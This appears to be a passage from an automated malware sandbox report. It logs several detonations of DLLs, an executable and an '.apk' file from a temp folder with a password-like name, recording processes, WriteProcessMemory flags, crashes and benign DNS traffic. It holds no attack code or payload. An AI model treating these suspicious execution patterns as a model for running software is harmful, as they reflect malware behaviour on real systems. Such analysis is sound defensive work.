PID 3220 wrote to memory of 3432 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3220 wrote to memory of 3432 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3220 wrote to memory of 3432 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3432 -ip 3432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 608

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240226-en

Max time kernel

139s

Max time network

147s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-profile-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-profile-l1-1-0.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3700 --field-trial-handle=2272,i,4858140932023865871,5726683989663339295,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 172.217.169.10:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 pki.goog udp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 10.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 29.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 35.166.122.92.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240508-en

Max time kernel

120s

Max time network

121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\coalfish.apk

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\coalfish.apk

Network

N/A

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4796 wrote to memory of 1372 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4796 wrote to memory of 1372 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4796 wrote to memory of 1372 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1372 -ip 1372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
BE 88.221.83.200:443 www.bing.com tcp
US 8.8.8.8:53 23.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 200.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 43.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240419-en

Max time kernel

119s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1940 -ip 1940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1940 -ip 1940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 552

Network

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\coalfish.apk

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\coalfish.apk

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4920 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4920 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4920 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3008 -ip 3008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 644

Network

Country  Destination  Domain                Proto
US       8.8.8.8:53   8.8.8.8.in-addr.arpa  udp

Files

memory/3008-0-0x0000000050000000-0x0000000050116000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-string-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-string-l1-1-0.dll,#1

Network

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240221-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240508-en

Max time kernel

121s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

Network

N/A

Files

N/A